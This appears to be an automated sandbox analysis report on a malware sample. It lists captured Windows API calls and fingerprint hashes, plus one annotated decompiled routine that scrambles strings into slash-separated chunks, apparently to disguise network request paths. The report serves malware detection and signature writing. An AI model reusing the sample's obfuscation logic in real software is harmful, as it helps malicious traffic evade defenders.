                                                            • Opcode ID: 68dda4ba5408d6b9bfa55a1ec79f65eef947849c2cc41569d30798d3e7c8cf39
                                                            • Instruction ID: bd3e2eb94d68a2bf9b2545459d0c8c04b3a26982186b9498c5b8258e338e07f6
                                                            • Opcode Fuzzy Hash: 68dda4ba5408d6b9bfa55a1ec79f65eef947849c2cc41569d30798d3e7c8cf39
                                                            • Instruction Fuzzy Hash: CE21BEB1201302BFE7206F24E848B2A77BCFF54715F00841DF95797241EF79E844AA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04583EF0
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04583F0B
                                                            • GetLastError.KERNEL32 ref: 04583F79
                                                            • GetLastError.KERNEL32 ref: 04583F88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 29b602d787d49c84b972f20c6bcc7a32b1733d02e88b611a6e056e5b10c18042
                                                            • Instruction ID: 0ab4feaa3d5da6a3f426be98e871062e2737f8da104e8c535889cb99af746dab
                                                            • Opcode Fuzzy Hash: 29b602d787d49c84b972f20c6bcc7a32b1733d02e88b611a6e056e5b10c18042
                                                            • Instruction Fuzzy Hash: 7C212B35501208EFCB12DFA4D844A9EBBB8FF44B11F108159F806A6251DB39EE15EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 0456881E
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04568862
                                                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 045688A5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 045688C8
                                                              • Part of subcall function 0456DD60: GetTickCount.KERNEL32 ref: 0456DD70
                                                              • Part of subcall function 0456DD60: CreateFileW.KERNEL32(04561DEA,80000000,00000003,0458C1A8,00000003,00000000,00000000,?,04561DEA,?), ref: 0456DD8D
                                                              • Part of subcall function 0456DD60: GetFileSize.KERNEL32(04561DEA,00000000,?,00000001,?,04561DEA,?), ref: 0456DDC0
                                                              • Part of subcall function 0456DD60: CreateFileMappingA.KERNEL32(04561DEA,0458C1A8,00000002,00000000,00000000,04561DEA), ref: 0456DDD4
                                                              • Part of subcall function 0456DD60: lstrlen.KERNEL32(04561DEA,?,04561DEA,?), ref: 0456DDF0
                                                              • Part of subcall function 0456DD60: lstrcpy.KERNEL32(?,04561DEA), ref: 0456DE00
                                                              • Part of subcall function 0456DD60: HeapFree.KERNEL32(00000000,04561DEA,?,04561DEA,?), ref: 0456DE1B
                                                              • Part of subcall function 0456DD60: CloseHandle.KERNEL32(04561DEA,?,00000001,?,04561DEA), ref: 0456DE2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                            • String ID:
                                                            • API String ID: 3239194699-0
                                                            • Opcode ID: fedc8f37d610c51c7e9cc7a20f855a969c00b8f291d00c932bb0acef0d5bd571
                                                            • Instruction ID: 520d01abea06e67b6b46b0feb2636c65b822ac7053280d6448c61d9bd8588550
                                                            • Opcode Fuzzy Hash: fedc8f37d610c51c7e9cc7a20f855a969c00b8f291d00c932bb0acef0d5bd571
                                                            • Instruction Fuzzy Hash: 8F213D31500209DBEB21EFA5ED44DDE7BB9FF84394F140525F91AA3161E730A546EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04568C4E: GetTickCount.KERNEL32 ref: 04568C64
                                                              • Part of subcall function 04568C4E: wsprintfA.USER32 ref: 04568CA5
                                                              • Part of subcall function 04568C4E: GetModuleHandleA.KERNEL32(00000000), ref: 04568CB7
                                                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 04574A82
                                                            • GetLastError.KERNEL32 ref: 04574A9C
                                                            • RtlExitUserThread.NTDLL(?), ref: 04574AB6
                                                            • GetLastError.KERNEL32 ref: 04574AF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
                                                            • String ID:
                                                            • API String ID: 1798890819-0
                                                            • Opcode ID: 9e7e1e17c2dfccaa8b205de31102b77860c45975430d9a314767d8a598a85189
                                                            • Instruction ID: eb01d7af504c431732bbd361a15ae398bcb2b49157a729de43e5de300a708ca6
                                                            • Opcode Fuzzy Hash: 9e7e1e17c2dfccaa8b205de31102b77860c45975430d9a314767d8a598a85189
                                                            • Instruction Fuzzy Hash: 8E115971101245BF9710AF66EC48D7BBBBDFA86761B040A2DF862D2150DB24AC09AB76
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04566D38
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0457E1A6,?), ref: 04566D4A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0457E1A6,?), ref: 04566D62
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,0457E1A6,?), ref: 04566D7D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                            • String ID:
                                                            • API String ID: 1352878660-0
                                                            • Opcode ID: db2445d62106c11a5fdad0ff894d4e5aa625cb6749a670a48dca797df797fa9e
                                                            • Instruction ID: d104dfa2e8303db07159c9a4195923a968856613e992d67947138aa8adf65486
                                                            • Opcode Fuzzy Hash: db2445d62106c11a5fdad0ff894d4e5aa625cb6749a670a48dca797df797fa9e
                                                            • Instruction Fuzzy Hash: FF117CB0600119BBEB20ABA5EC88EAF7E7CFF41754F144128F505E6050D730AA40EAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 0458101F
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 04581041
                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0458106D
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04581080
                                                              • Part of subcall function 0457435F: strstr.NTDLL ref: 04574437
                                                              • Part of subcall function 0457435F: strstr.NTDLL ref: 0457448A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3712611166-0
                                                            • Opcode ID: 8d4e701b91f06650872650c6ee6dfb1f4fbc855ff6756a91d670fbc3eb084ede
                                                            • Instruction ID: cbe67d0c17c640d7306dfb3795911561893879e6d29250f697f502ad2bba20e3
                                                            • Opcode Fuzzy Hash: 8d4e701b91f06650872650c6ee6dfb1f4fbc855ff6756a91d670fbc3eb084ede
                                                            • Instruction Fuzzy Hash: 0B113A7260111AFFDB11AFA1DC88C9F7BBCFF45255B008029F905A6110DB35EE56ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(0458B620,0458B7A4,00000402,0458B7A4), ref: 0456FB63
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,0458B620), ref: 0456FB7A
                                                            • StrChrA.SHLWAPI(00000000,0000002E), ref: 0456FB83
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0456FBA1
                                                              • Part of subcall function 0457046C: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,0457C495,?,0458B620,0457C495,?,00000000,00000004,0456A09A,?,810C74FC), ref: 04570543
                                                              • Part of subcall function 0457046C: VirtualProtect.KERNELBASE(0458B7A4,00000004,0456A09A,0456A09A,0457C495,?,00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36), ref: 0457055E
                                                              • Part of subcall function 0457046C: RtlEnterCriticalSection.NTDLL(0458C300), ref: 04570582
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 105881616-0
                                                            • Opcode ID: 1390003393293429618b5a9f86c0ce38a4b0db8c6a7cbc1761200f5b99f833e1
                                                            • Instruction ID: 846084f6bab1d6fed927e4781bf288a4ebfd0eaef6a44fc16fd056cdc6aca020
                                                            • Opcode Fuzzy Hash: 1390003393293429618b5a9f86c0ce38a4b0db8c6a7cbc1761200f5b99f833e1
                                                            • Instruction Fuzzy Hash: 65217C75A04205EFDB10DF68D958AAEBBF9FF45304F108459E406AB260EB74E940EB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 04572B5A
                                                            • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 04572B7E
                                                            • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 04572BD6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 04572BA7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue$AllocateCloseHeapOpen
                                                            • String ID:
                                                            • API String ID: 453107315-0
                                                            • Opcode ID: 6f4068ab22fe95ec16aff789868e157c30e2c7eb253c82e867f227189f62fa7c
                                                            • Instruction ID: 8181f974b0b5744b93f098e877eabb9e31462e0c5dbcd9155d6cf4ad44a7245e
                                                            • Opcode Fuzzy Hash: 6f4068ab22fe95ec16aff789868e157c30e2c7eb253c82e867f227189f62fa7c
                                                            • Instruction Fuzzy Hash: 8021C4B590010DFFDB119F94E880CEEBBBDFF88340F5084A6F805A6111E775AA94EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04577E4A,00000000,?,?,045763BE,00000000,049BB188), ref: 04573633
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457364B
                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04577E4A,00000000,?,?,045763BE,00000000,049BB188), ref: 0457368F
                                                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 045736B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: 1a19199cad46f97b2c7ab4ec0f771d6e2233ba622c5b2480602ff9bcf45f587c
                                                            • Instruction ID: f0f36f31677834c03d14c4fddeb4dbc0c2b026fe6aa8b3f8dec088df70d988d3
                                                            • Opcode Fuzzy Hash: 1a19199cad46f97b2c7ab4ec0f771d6e2233ba622c5b2480602ff9bcf45f587c
                                                            • Instruction Fuzzy Hash: AA11EC72A00215EFD7108F69ECC4D9E7FAEFB91660F150179F505E7250EA74AE04E7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
/* Decompiler output for the function at 0x00DD6006 (see the API list below).
 * It takes a NUL-terminated string in eax and returns a heap copy in which a
 * '/' is inserted after each pseudo-random chunk of 8 to 23 bytes until 8 or
 * fewer bytes remain; the tail is copied verbatim. Chunk lengths come from a
 * linear congruential generator whose state lives in the global at 0xdda2a8;
 * the multiplier 0x19660d and increment 0x3c6ef35f are the classic Numerical
 * Recipes LCG constants and are a usable static signature for this routine. */
E00DD6006(unsigned int __eax, void* __ecx) {
    void* _v8;
    void* _v12;
    signed int _t21;
    signed short _t23;
    char* _t27;
    void* _t29;
    void* _t30;
    unsigned int _t33;
    void* _t37;
    unsigned int _t38;
    void* _t41;
    void* _t42;
    int _t45;
    void* _t46;

    _t42 = __eax;                                    /* input string */
    /* lstrlen(input) per the API list (ref 00DD6011); the extra arguments are decompiler noise */
    __imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
    _t38 = __eax;                                    /* bytes of input still to process */
    /* output buffer: len + len/8 + 1, room for one '/' per 8-byte minimum chunk plus the NUL;
       *0xdda290 holds the module's private heap handle */
    _t30 = RtlAllocateHeap( *0xdda290, 0, (__eax >> 3) + __eax + 1);
    _v12 = _t30;
    if(_t30 != 0) {
        _v8 = _t42;                                  /* read cursor into the input */
        do {
            _t33 = 0x18;                             /* chunk bound: 24 bytes, or what is left */
            if(_t38 <= _t33) {
                _t33 = _t38;
            }
            _t21 =  *0xdda2a8; // 0x1c044bba        (LCG state captured at analysis time)
            _t23 = 0x3c6ef35f + _t21 * 0x19660d;     /* advance the LCG */
             *0xdda2a8 = _t23;
            /* chunk length in [8, _t33 - 1] taken from the low 16 bits of the LCG state */
            _t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            memcpy(_t30, _v8, _t45);                 /* copy the chunk */
            _v8 = _v8 + _t45;
            _t27 = _t30 + _t45;
            _t38 = _t38 - _t45;
            _t46 = _t46 + 0xc;                       /* add esp, 0xc after the cdecl memcpy; decompiler artifact */
             *_t27 = 0x2f;                           /* append the '/' separator */
            _t13 = _t27 + 1; // 0x1
            _t30 = _t13;                             /* write cursor past the separator */
        } while (_t38 > 8);
        memcpy(_t30, _v8, _t38 + 1);                 /* copy the final chunk including the NUL */
    }
    return _v12;                                     /* heap buffer, or NULL on allocation failure */
}

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DD6410,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD6011
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD6029
                                                            • memcpy.NTDLL(00000000,039C9630,-00000008,?,?,?,00DD6410,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD606D
                                                            • memcpy.NTDLL(00000001,039C9630,00000001,00DD72E3,00000000,039C9630), ref: 00DD608E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: c69c72c162e257b4e1d904c37419f6f33e9d6985790a7a60e0dc649eebe69428
                                                            • Instruction ID: 08a5b2ada8a7303fb4bf842eff952ad010304b2aea973aec0870676568db635e
                                                            • Opcode Fuzzy Hash: c69c72c162e257b4e1d904c37419f6f33e9d6985790a7a60e0dc649eebe69428
                                                            • Instruction Fuzzy Hash: C111C672A01214BFD7208B6ADC84DAEBFBEEB80760B194167F508D7350E6719E04C7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,0457EE19,00000000,00000000), ref: 04575BA1
                                                            • GetLastError.KERNEL32(?,00000000,?,0457EE19,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0456C0ED,?,0000001E), ref: 04575BA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 203985260-0
                                                            • Opcode ID: d8c2a8f4fee79e2cd5e0a2042fb88839fadbfff5663a35f2484adbc416e3a537
                                                            • Instruction ID: 21aabe17eaf92eef2158cf7ff04d063f6fd47b7c1c310e5a802ddc2c4a1b4881
                                                            • Opcode Fuzzy Hash: d8c2a8f4fee79e2cd5e0a2042fb88839fadbfff5663a35f2484adbc416e3a537
                                                            • Instruction Fuzzy Hash: 4001FC71108255FF8330AA266C48C3BBB7CFBC6760F004A2DF866E2180EE216804E671
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,04568A86,?,?,?,?,?,?,?,?,?), ref: 04582004
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • mbstowcs.NTDLL ref: 0458201E
                                                            • lstrlen.KERNEL32(?,?,00000008), ref: 04582029
                                                            • mbstowcs.NTDLL ref: 04582043
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                            • String ID:
                                                            • API String ID: 1961997177-0
                                                            • Opcode ID: a3d6fed951447a717fb6c6544775b521a928e9d2ae9520e98ed22e24276a9ba2
                                                            • Instruction ID: d3b7d359efd1041ad8702bd988093ba571d7b7ec84dc6b6772c777a51f040367
                                                            • Opcode Fuzzy Hash: a3d6fed951447a717fb6c6544775b521a928e9d2ae9520e98ed22e24276a9ba2
                                                            • Instruction Fuzzy Hash: 2701B17250030AB7DB217BA59C45F8F7FACFFD4B54F20402DB905A6100EE76E910A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04577D41
                                                            • lstrlen.KERNEL32(049BAAC0), ref: 04577D62
                                                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04577D7A
                                                            • lstrcpy.KERNEL32(00000000,049BAAC0), ref: 04577D8C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1929783139-0
                                                            • Opcode ID: 53c951c3ebf76f1785f05825407dbac5c03905b58ae79ab318a83d9462d8770c
                                                            • Instruction ID: 1f99c6881b906394a234881c2c3e42144eb5f52ffc0bfad123c64116a1269e39
                                                            • Opcode Fuzzy Hash: 53c951c3ebf76f1785f05825407dbac5c03905b58ae79ab318a83d9462d8770c
                                                            • Instruction Fuzzy Hash: 53018C75500344FBC7119F99B848E6E7BBCFB49641F144069E90AE3241DA34E908EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?), ref: 0456C3E7
                                                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0456C40D
                                                            • lstrcpy.KERNEL32(00000014,?), ref: 0456C432
                                                            • memcpy.NTDLL(?,?,?), ref: 0456C43F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 1388643974-0
                                                            • Opcode ID: ac915e3038e2b2082a603dae0171126375451eb5e4b1039ce3d6cf08f3a2acd1
                                                            • Instruction ID: 126f0bca9d9714e88c5e953d296271a2cb3b7dd82f8d0339e4ea64d801bf7673
                                                            • Opcode Fuzzy Hash: ac915e3038e2b2082a603dae0171126375451eb5e4b1039ce3d6cf08f3a2acd1
                                                            • Instruction Fuzzy Hash: 3011467150030AEFCB21CF58D884E9ABBF8FB48715F10846DF99A9B211D775E908EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • RtlInitializeCriticalSection.NTDLL(0458C300), ref: 0456D488
                                                            • RtlInitializeCriticalSection.NTDLL(0458C2E0), ref: 0456D49E
                                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456D4AF
                                                            • GetModuleHandleA.KERNEL32(0000170B), ref: 0456D4E3
                                                              • Part of subcall function 04561401: GetModuleHandleA.KERNEL32(?,00000001,77109EB0,00000000,?,?,?,?,00000000,0456D4C6), ref: 04561419
                                                              • Part of subcall function 04561401: LoadLibraryA.KERNEL32(?), ref: 045614BA
                                                              • Part of subcall function 04561401: FreeLibrary.KERNEL32(00000000), ref: 045614C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                            • String ID:
                                                            • API String ID: 1711133254-0
                                                            • Opcode ID: 4411aab6595d89badf739839771edb7dcd64825b4b0d5b071a60ef101a63b14f
                                                            • Instruction ID: a0833800ad8dac0c322ee092b9ee4bd1c430678c25cbb27a4040eca2dc3ad7b9
                                                            • Opcode Fuzzy Hash: 4411aab6595d89badf739839771edb7dcd64825b4b0d5b071a60ef101a63b14f
                                                            • Instruction Fuzzy Hash: B4116171A002048BD722EFA9B88490977E5F745715700192EE686F3280DFB8AC0CBBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,0457494D,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 04568BD7
                                                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 04568BEF
                                                            • memcpy.NTDLL(0000000C,?,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04568C05
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04568C37
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3208927540-0
                                                            • Opcode ID: 475a7d81fb169f39f73c2d169dd0d28c0a72e9cbfabb053da13d7191c482b12f
                                                            • Instruction ID: 208738c8655c699d65f3379ba182ab1fb9176e8e2e10544cf5e7173b93f0422e
                                                            • Opcode Fuzzy Hash: 475a7d81fb169f39f73c2d169dd0d28c0a72e9cbfabb053da13d7191c482b12f
                                                            • Instruction Fuzzy Hash: 4F01D431602702EBF3216E12EC44F2B7BA8FB80756F004429F616AA180DB64AC4DF760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 04571363
                                                            • Sleep.KERNEL32(0000000A,?,?,04573BC6,00000000,?,0458C140), ref: 0457136D
                                                            • SetEvent.KERNEL32(?,?,04573BC6,00000000,?,0458C140), ref: 045713C4
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 045713E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeaveSleep
                                                            • String ID:
                                                            • API String ID: 1925615494-0
                                                            • Opcode ID: 3525d707136458f26a6ce0207cc0656dbc83309d4e851b4e123d1bd03d02ed31
                                                            • Instruction ID: 2817c8d4fd1bfc2135a913410292d9eab95d7244ba8c03115385bbd1d53bc9d2
                                                            • Opcode Fuzzy Hash: 3525d707136458f26a6ce0207cc0656dbc83309d4e851b4e123d1bd03d02ed31
                                                            • Instruction Fuzzy Hash: B8014071640304EBE711ABB4FC85B5A3BA8FB04715F105029F606F61D0DE79AD08BB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04581AD6: lstrlen.KERNEL32(?,?,00000000,04561C68), ref: 04581ADB
                                                              • Part of subcall function 04581AD6: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04581AF0
                                                              • Part of subcall function 04581AD6: wsprintfA.USER32 ref: 04581B0C
                                                              • Part of subcall function 04581AD6: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04581B28
                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04561C80
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 04561C8F
                                                            • CloseHandle.KERNEL32(00000000), ref: 04561C99
                                                            • GetLastError.KERNEL32 ref: 04561CA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 4042893638-0
                                                            • Opcode ID: 96ab88cbb839397c1c724daa4c8674fedb8fcef6dfd0a4084f1d9ae11b1dd6e6
                                                            • Instruction ID: 6ec143b160829399bbb727734e5826f5facc9fd81a07bfd658848761c6af8545
                                                            • Opcode Fuzzy Hash: 96ab88cbb839397c1c724daa4c8674fedb8fcef6dfd0a4084f1d9ae11b1dd6e6
                                                            • Instruction Fuzzy Hash: 11F0F471201614FBE7212B66ED88FAF7F6CFF417A0F10411AF50AE6080DA34A904B3B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 04578EBA
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
